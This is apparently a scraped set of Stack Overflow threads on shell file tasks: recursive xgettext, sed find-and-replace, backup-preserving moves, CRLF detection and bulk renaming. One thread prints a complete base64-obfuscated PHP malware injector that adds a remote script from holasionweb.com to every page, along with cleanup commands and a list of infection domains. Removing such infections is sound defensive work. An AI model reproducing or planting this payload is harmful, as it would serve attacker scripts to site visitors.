How can I compile a .po file using xgettext with PHP files with a single command recursively?
My PHP files exist in a hierarchy, and the straight xgettext command doesn't seem to dig down recursively.
Got it:
find . -iname "*.php" | xargs xgettext
I was trying to use -exec before, but that would only run one file at a time. This runs it on the whole bunch.
Yay Google!
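The difference between -exec and xargs is easy to see with a stand-in command (echo here, since the point is the number of invocations, not xgettext itself; the file names are made up):

```shell
# -exec ... \; runs the command once per file; piping to xargs batches
# all the file names into a single invocation.
cd "$(mktemp -d)"
touch a.php b.php c.php
find . -iname '*.php' -exec echo invoked with {} \;   # three invocations, one per file
find . -iname '*.php' | xargs echo invoked with       # one invocation for the batch
```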
For the Windows command line, a simple solution is:
@echo off
echo Generating file list..
dir html\wp-content\themes\wpt\*.php /L /B /S > %TEMP%\listfile.txt
echo Generating .POT file...
xgettext -k_e -k__ --from-code utf-8 -o html\wp-content\themes\wpt\lang\wpt.pot -L PHP --no-wrap -D html\wp-content\themes\wpt -f %TEMP%\listfile.txt
echo Done.
del %TEMP%\listfile.txt
You cannot achieve this with one single command. The xgettext option --files-from is your friend.
find . -name '*.php' >POTFILES
xgettext --files-from=POTFILES
If you are positive that you do not have too many source files you can also use find with xargs:
find . -name "*.php" -print0 | xargs -0 xgettext
However, if you have too many source files, xargs will invoke xgettext multiple times so that the maximum command-line length of your platform is not exceeded. In order to protect yourself against that case you have to use the xgettext option -j, --join-existing, remove the stale messages file first, and start with an empty one so that xgettext does not bail out:
rm -f messages.po
echo >messages.po
find . -name "*.php" -print0 | xargs -0 xgettext --join-existing
Compare that with the simple solution given first with the list of source files in POTFILES!
Using find with -exec is very inefficient because it will invoke xgettext once for every source file to search for translatable strings. In the particular case of xgettext -j it is even more inefficient, because xgettext has to read the ever-growing output file messages.po on every invocation (that is, with every input source file).
Here's a solution for Windows. At first, install gettext and find from the GnuWin32 tools collection.
http://gnuwin32.sourceforge.net/packages/gettext.htm
http://gnuwin32.sourceforge.net/packages/findutils.htm
You can run the following command afterwards:
find /source/directory -iname "*.php" -exec xgettext -j -o /output/directory/messages.pot {} ;
The output file has to exist prior to running the command, so the new definitions can be merged with it.
This is the solution I found for recursive search on Mac:
xgettext -o translations/messages.pot --keyword=gettext `find . -name "*.php"`
This generates entries for all uses of the gettext function in files with the .php extension, including subfolders, and inserts them in translations/messages.pot.
My wordpress site has been infected with the eval(gzinflate(base64_decode(' hack.
I would like to ssh into the server and find replace all of these lines within my php files with nothing.
I tried the following command:
find . -name "*.php" -print | xargs sed -i 'MY STRING HERE'
I think this is not working because the string has / characters within it which I think need to be escaped.
Can someone please let me know how to escape these characters?
Thanks in advance.
I haven't tried this, so BACK UP YOUR FILES FIRST! As mentioned in some of the comments, this is not the best idea; it might be better to try some other approaches. Anyhow, what about this?
find . -name "*.php" -type f -exec sed -i '/eval(gzinflate(base64_decode(/d' {} \;
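A quick sanity check on a throwaway file (the file name and contents below are made up) shows the sed d command removing only the matching line:

```shell
# Create a fake infected file, delete lines containing the eval signature,
# and confirm the rest of the file survives.
f=$(mktemp)
printf '<?php\neval(gzinflate(base64_decode("xxxx")));\necho "still here";\n' > "$f"
sed -i '/eval(gzinflate(base64_decode(/d' "$f"
cat "$f"
```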
If you have Perl available:
perl -p -i'.bck' -e 's/oldstring/newstring/g' `find ./ -name '*.php'`
All modified files will get a backup with the '.bck' suffix.
sed accepts different delimiters, such as # % | ; or :, in its substitute command.
Hence, when the substitution itself involves the usual / delimiter, any of the other delimiters can be used in the sed command so that there is no need to escape the slashes.
Example:
When the replacement/substitution involves "/", the following can be used:
sed 's#/will/this/work#/this/is/working#g' file.txt
Coming to your question, your replacement/substitution involves "/", hence you can use any of the other delimiters.
find . -name "*.php" -print | xargs sed -i 's#/STRING/TO/BE/REPLACED#/REPLACEMENT/STRING#g'
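To convince yourself that the delimiters are interchangeable, compare two equivalent substitutions:

```shell
# The same substitution written with '#' and with '|' as the delimiter;
# both print /this/is/working
echo '/will/this/work' | sed 's#/will/this/work#/this/is/working#g'
echo '/will/this/work' | sed 's|/will/this/work|/this/is/working|g'
```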
I'm trying in PHP to move a folder but keep both files in the destination folder if a duplicate exists.
I tried to do that with recursion, but it's too complicated; so many things can go wrong, for example file permissions and duplicate files/folders.
I'm trying to work with the system() command, and I can't figure out how to move files but keep a backup on duplicates without destroying the extension.
$last_line = system('mv --backup=t websites/test/ websites/test2/', $retval);
gives the following if file exist in both dirs:
ajax.html~
ajax.html~1
ajax.html~2
What I'm looking for is:
ajax~.html
ajax~1.html
ajax~2.html
or any other scheme like (1), (2), ..., as long as the file's extension is not ruined.
Any ideas? Please.
P.S. I must use the system() command.
For this problem, I get sed to swap the extension and the backup number after the fact with the function below (passing my target directory as the argument):
swap_file_extension_and_backup_number ()
{
IFS=$'\n'
for y in $(ls "$1")
do
  mv "$1/$y" "$1/$(echo "$y" | sed 's/\(\.[^~]\{3\}\)\(\.~[0-9]\{1,2\}~\)$/\2\1/')"
done
}
The function assumes that your file extensions are the usual 3 characters long, and it finds backup numbers of up to two digits, i.e. .~99~
Explanation:
The first mv argument, "$1/$y", is the original file; quoting it protects you from space characters in the name.
The second argument pipes the name through sed 's/\(\.[^~]\{3\}\)\(\.~[0-9]\{1,2\}~\)$/\2\1/', which produces the target file name: the two parenthetic groups are swapped, i.e. /\2\1/, so name.ext.~N~ becomes name.~N~.ext.
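A self-contained demonstration of the same swap (the directory and file name are made up; a 3-character extension is assumed):

```shell
d=$(mktemp -d)
touch "$d/ajax.htm.~1~"   # the form cp/mv --backup=numbered produces
# Swap the ".ext" and ".~N~" groups at the end of each backup name.
for y in "$d"/*.~*~; do
  mv "$y" "$(printf '%s\n' "$y" | sed 's/\(\.[^~]\{3\}\)\(\.~[0-9]\{1,2\}~\)$/\2\1/')"
done
ls "$d"   # ajax.~1~.htm
```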
If you want to keep the original files and just create a copy, use cp instead of mv.
If you want to create a backup archive, make a gzipped tar of the folder like this:
tar -pczf name_of_your_archive.tar.gz /path/to/directory/to/backup
rsync --ignore-existing --remove-source-files /path/to/source /path/to/dest
Use rsync with the --backup and --backup-dir options. eg:
rsync -a --backup --backup-dir /usr/local/backup/2013/03/20/ /path/to/source /path/to/dest
Every time a file might be overwritten it is copied to the folder given, plus the path to that item. eg: /path/to/dest/path/to/source/file.txt
From the looks of things, there doesn't seem to be any built-in method to back up files while keeping the extension at the correct place. I could be wrong, but I was not able to find one that doesn't do what your original question already pointed out.
Since you said that it's complicated to copy the files over using php, perhaps you can do it the same way you are doing it right now, getting the files in the format
ajax.html~
ajax.html~1
ajax.html~2
Then using PHP to parse through the files and rename them to the format you want. This way you won't have to deal with permissions, and duplicate files, which are complications you mentioned. You just have to look for files with this format, and rename them.
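That rename step can be sketched as follows (shown here in shell rather than PHP, just to illustrate the pattern; the file names come from the question):

```shell
d=$(mktemp -d); cd "$d"
touch 'ajax.html~' 'ajax.html~1' 'ajax.html~2'
# Turn "name.ext~N" into "name~N.ext" (N may be empty).
for f in *~*; do
  new=$(printf '%s\n' "$f" | sed 's/\(\.[^.~]*\)\(~[0-9]*\)$/\2\1/')
  [ "$new" != "$f" ] && mv -- "$f" "$new"
done
ls   # ajax~.html  ajax~1.html  ajax~2.html
```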
I am not responding strictly to your question, but the case I am presenting here is very common and therefore valid!
Here's my hack!
TO USE WITH FILES:
#!/bin/bash
# It will find all the files according to the arguments in
# "<YOUR_ARGUMENT_TO_FIND_FILES>" ("find" command) and move them to the
# "<DEST_FOLDER>" folder. Files with the same name will follow the pattern:
# "same_name.ext", "same_name (1).ext", "same_name (2).ext",
# "same_name (3).ext"...
cd <YOUR_TARGET_FOLDER>
mkdir ./<DEST_FOLDER>
find ./ -iname "<YOUR_ARGUMENT_TO_FIND_FILES>" -type f -print0 | xargs -0 -I "{}" sh -c 'cp --backup=numbered "{}" "./<DEST_FOLDER>/" && rm -f "{}"'
cd ./<DEST_FOLDER>
for f_name in *.~*~; do
f_bak_ext="${f_name##*.}"
f_bak_num="${f_bak_ext//[^0-9]/}"
f_orig_name="${f_name%.*}"
f_only_name="${f_orig_name%.*}"
f_only_ext="${f_orig_name##*.}"
mv "$f_name" "$f_only_name ($f_bak_num).$f_only_ext"
done
cd ..
TO USE WITH FOLDERS:
#!/bin/bash
# It will find all the folders according to the arguments in
# "<YOUR_ARGUMENT_TO_FIND_FOLDERS>" ("find" command) and move them to the
# "<DEST_FOLDER>" folder. Folders with the same name will have their contents
# merged, however files with the same name WILL NOT HAVE DUPLICATES (example:
# "same_name.ext", "same_name (1).ext", "same_name (2).ext",
# "same_name (3).ext"...).
cd <YOUR_TARGET_FOLDER>
find ./ -path "./<DEST_FOLDER>" -prune -o -iname "<YOUR_ARGUMENT_TO_FIND_FOLDERS>" -type d -print0 | xargs -0 -I "{}" sh -c 'rsync -a "{}" "./<DEST_FOLDER>/" && rm -rf "{}"'
This solution might work in this case
cp --backup=simple src dst
Or
cp --backup=numbered src dst
You can also specify a suffix
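As a sketch (GNU cp assumed; the file names are made up), a simple backup with a custom suffix behaves like this:

```shell
d=$(mktemp -d); cd "$d"
echo old > dst
echo new > src
# --backup=simple saves the old dst under the given suffix before overwriting.
cp --backup=simple --suffix=.bak src dst
cat dst       # new
cat dst.bak   # old
```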
I know for a fact that these PHP files exist. I can open them in Vim and see the offending character.
I found several links here on Stack Overflow that suggest remedies for this, but none of them work properly. I know for a fact that several files do not contain the ^M characters (CRLF line endings); however, I keep getting false positives.
find . -type f -name "*.php" -exec fgrep -l $'\r' "{}" \;
Returns false positives.
find . -not -type d -name "*.php" -exec file "{}" ";" | grep CRLF
Returns nothing.
etc...etc...
Edit: Yes, I am executing these lines in the offending directory.
Do you use a source control repository for storing your files? Many of them have the ability to automatically make sure that line endings of files are correct upon commit. I can give you an example with Subversion.
I have a pre-commit hook that allows me to specify what properties in Subversion must be on what files in order for those files to be committed. For example, I could specify that any file that ends in *.php must have the property svn:eol-style set to LF.
If you use this, you'll never have an issue with the ^M line endings again.
As for finding them, I've been able to do this:
$ find . -type f -exec egrep -l "^M$" {} \;
Where ^M is a Control-M. With Bash or Kornshell, you can get that by pressing Control-V, then Control-M. You might have to have set -o vi for it to work.
A little Perl can not only reveal the files but change them as desired. To find your culprits, do:
find . -type f -name "*.php" -exec perl -ne 'print $ARGV if m{\r$}' {} + > badstuff
Now, if you want to remove the pesky carriage return:
perl -pe 's{\r$}{}' $(<badstuff)
...which eliminates the carriage return from all of the affected files. If you want to do that and create a backup copy too, do:
perl -pi.old -e 's{\r$}{}' $(<badstuff)
I tend to use the instructions provided at http://kb.iu.edu/data/agiz.html to do this. The following will change the ^M in a specific file to a \n return and place that into a new file using tr:
tr '\r' '\n' < macfile.txt > unixfile.txt
This does the same thing just using perl instead. With this one you can probably pipe in a series of files:
perl -p -e 's/\r/\n/g' < macfile.txt > unixfile.txt
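For example, on a file with classic Mac (CR-only) line endings (the file names are made up):

```shell
d=$(mktemp -d); cd "$d"
printf 'line1\rline2\r' > macfile.txt   # CR-only line endings
tr '\r' '\n' < macfile.txt > unixfile.txt
cat unixfile.txt
```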
The file command will tell you which kinds of line-end characters it sees:
$ file to-do.txt
to-do.txt: ASCII text, with CRLF line terminators
$ file mixed.txt
mixed.txt: ASCII text, with CRLF, LF line terminators
So you could run e.g.
find . -type f -name "*.php" -exec file "{}" \; | grep -c CRLF
to count the number of files that have at least some CRLF line endings.
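Assuming a reasonably recent file(1), a quick check on generated files confirms the reported line-terminator types:

```shell
d=$(mktemp -d)
printf 'dos line\r\n' > "$d/crlf.txt"
printf 'unix line\n'  > "$d/lf.txt"
file "$d/crlf.txt"   # typically: ASCII text, with CRLF line terminators
file "$d/lf.txt"     # typically: ASCII text
```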
You could also use dos2unix or fromdos to convert them all to LF only:
find . -type f -name "*.php" -exec dos2unix "{}" \;
You might also care whether these tools touch all of the files or just the ones that need to be converted; check the tool documentation.
I want to rename all files in a folder and add a .xml extension. I am using Unix. How can I do that?
On the shell, you can do this:
for file in *; do
if [ -f ${file} ]; then
mv ${file} ${file}.xml
fi
done
Edit
To do this recursively on all subdirectories, you should use find:
for file in $(find -type f); do
mv ${file} ${file}.xml
done
On the other hand, if you're going to do anything more complex than this, you probably shouldn't use shell scripts.
Better still
Use the comment provided by Jonathan Leffler below:
find . -type f -exec mv {} {}.xml ';'
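A quick run on a scratch directory (file names made up) shows the effect; the extra ! -name '*.xml' guards against renaming a file twice if find happens to see it again after the move:

```shell
d=$(mktemp -d)
touch "$d/report" "$d/notes"
# Append .xml to every regular file that doesn't already have it.
find "$d" -type f ! -name '*.xml' -exec mv {} {}.xml ';'
ls "$d"   # notes.xml  report.xml
```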
I don't know if this is standard, but my Perl package (Debian/Ubuntu) includes a /usr/bin/prename (and a symlink named just rename) which has no other purpose:
rename 's/$/.xml/' *
find . -type f \! -name '*.xml' -print0 | xargs -0 rename 's/$/.xml/'
In Python:
Use os.listdir to find names of all files in a directory. If you need to recursively find all files in sub-directories as well, use os.walk instead. Its API is more complex than os.listdir but it provides powerful ways to recursively walk directories.
Then use os.rename to rename the files.
I have a problem removing virus code from my PHP files. There are more than 1200 PHP files on my server, and every single one has been infected by a virus. The virus adds this line to the HTML output:
<script src="http://holasionweb.com/oo.php"></script>
This is the virus code:
<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5b2IyeGhjMmx2Ym5kbFlpNWpiMjB2YjI4dWNHaHdJajQ4TDNOamNtbHdkRDQ9Iik7ICAgICAgfSAgICAgIHJldHVybiAiIjsgICAgIH0gICAgfSAgICAgICAgaWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ICAgICBmdW5jdGlvbiBnemRlY29kZSgkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDKXsgICAgICAkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEPUBvcmQoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDMsMSkpOyAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9MTA7ICAgICAgJFJBM0Q1MkU1MkE0ODkzNkNERTBGNTM1NkJCMDg2NTJGMj0wOyAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmNCl7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9QHVucGFjaygndicsc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMTAsMikpOyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPSRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUJbMV07ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTIrJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQjsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY4KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMTYpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYyKXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9M
jsgICAgICB9ICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz1AZ3ppbmZsYXRlKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSk7ICAgICAgaWYoJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz09PUZBTFNFKXsgICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz0kUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDOyAgICAgIH0gICAgICByZXR1cm4gJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1MzsgICAgIH0gICAgfSAgICBmdW5jdGlvbiBtcm9iaCgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKXsgICAgIEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgICAgJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERT1nemRlY29kZSgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKTsgICAgICAgaWYocHJlZ19tYXRjaCgnL1w8XC9ib2R5L3NpJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKSl7ICAgICAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21sKCkuIlxuIi4nJDEnLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpOyAgICAgfWVsc2V7ICAgICAgcmV0dXJuICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUuZ21sKCk7ICAgICB9ICAgIH0gICAgb2Jfc3RhcnQoJ21yb2JoJyk7ICAgfSAgfQ=="));?>
The above code is in every single PHP file. How can I remove this virus code from every PHP file? Is there a quick way to do it?
Save the code below as cleaner.php, upload it to your root directory, and call it via your browser.
Site clean up by http://sucuri.net<br />
This script will clean the malware from this attack:
http://sucuri.net/malware/entry/MW:MROBH:1
<br /><br />
If you need help, contact dd#sucuri.net or visit us at <a href="http://sucuri.net/index.php?page=nbi">
http://sucuri.net/index.php?page=nbi</a>
<br />
<br />
<?php
$dir = "./";
$rmcode = `find $dir -name "*.php" -type f |xargs sed -i 's#<?php /\*\*/ eval(base64_decode("aWY.*?>##g' 2>&1`;
echo "Malware removed.<br />\n";
$emptyline = `find $dir -name "*.php" -type f | xargs sed -i '/./,$!d' 2>&1`;
echo "Empty lines removed.<br />\n";
?>
<br />
Completed.
A simple command over SSH, something like this (sed has no non-greedy .*?, so use a negated character class instead):
find /path/to/docroot -name '*.php' -exec sed -i 's#<script src="http://holasionweb[^<]*</script>##g' {} \;
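Since sed has no non-greedy .*?, a negated character class is a safe way to match just the injected tag. A quick test on a throwaway file (contents made up beyond the tag from the question) verifies the substitution before running it across the docroot:

```shell
f=$(mktemp)
printf '<html><script src="http://holasionweb.com/oo.php"></script></html>\n' > "$f"
# [^<]* stops at the next tag, so only the injected <script> element is removed.
sed -i 's#<script src="http://holasionweb[^<]*</script>##g' "$f"
cat "$f"   # <html></html>
```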
Why not set up a quick script in your favorite scripting language to look through every file for something similar to that and remove it? Sounds like a 10-minute script to me.
Note: I say script because 1200 files is too many to do manually.
The first answer above is missing some code to complete the removal.
It also needs to remove the HTML script line that injects JavaScript into the PHP/HTML page (typically located at the end of the page near the tag, header, or otherwise).
Although as of 5/12/2010, holasionweb is the main source of the JavaScript injection (at least that I have seen), the page above, http://sucuri.net/malware/entry/MW:MROBH:1,
refers to several "possible" JavaScript sources that need to be removed.
(Infected malware javascript sites)
www.indesignstudioinfo.com/ls.php
zettapetta.com/js.php
holasionweb.com/oo.php
Add these lines to remove the calls to the 3 malware sources (if your infection uses another source, modify the regular expression accordingly):
$removejs = `find $dir -name "*.php" -type f |xargs sed -i 's#<script src="http://holasionweb\.com.*/script>##g' 2>&1`;
$removejs = `find $dir -name "*.php" -type f |xargs sed -i 's#<script src="http://www.indesignstudioinfo\.com.*/script>##g' 2>&1`;
$removejs = `find $dir -name "*.php" -type f |xargs sed -i 's#<script src="http://zettapetta\.com.*/script>##g' 2>&1`;
echo "Javascript removed.\n";
On some machines (those with BSD sed, e.g. macOS, rather than GNU/Linux) you have to add an empty "" after sed's -i. After that, the command looks like this:
$rmcode = `find $dir -name "*.php" -type f |xargs sed -i "" 's#<?php /\*\*/ eval(base64_decode("aWY.*?>##g' 2>&1`;
If it's exactly the same piece of code in each file, you could download Notepad++, for example. Open all the files and use the Find in Files tab of the Find dialog (Ctrl+F) to replace this PHP code in every file.
The question nobody asked, but should: How did the files get infected on the server?
It is no use removing the traces of a virus if the infection method has not been found. If it is a security bug of an installed software package, then removal will likely not get you anything but reinfection, possibly after a short break. If it is a weak password that has been cracked, not changing it will leave the server subject to the same attack over and over again.
So the first step after detecting such an attack: Find out how it was done!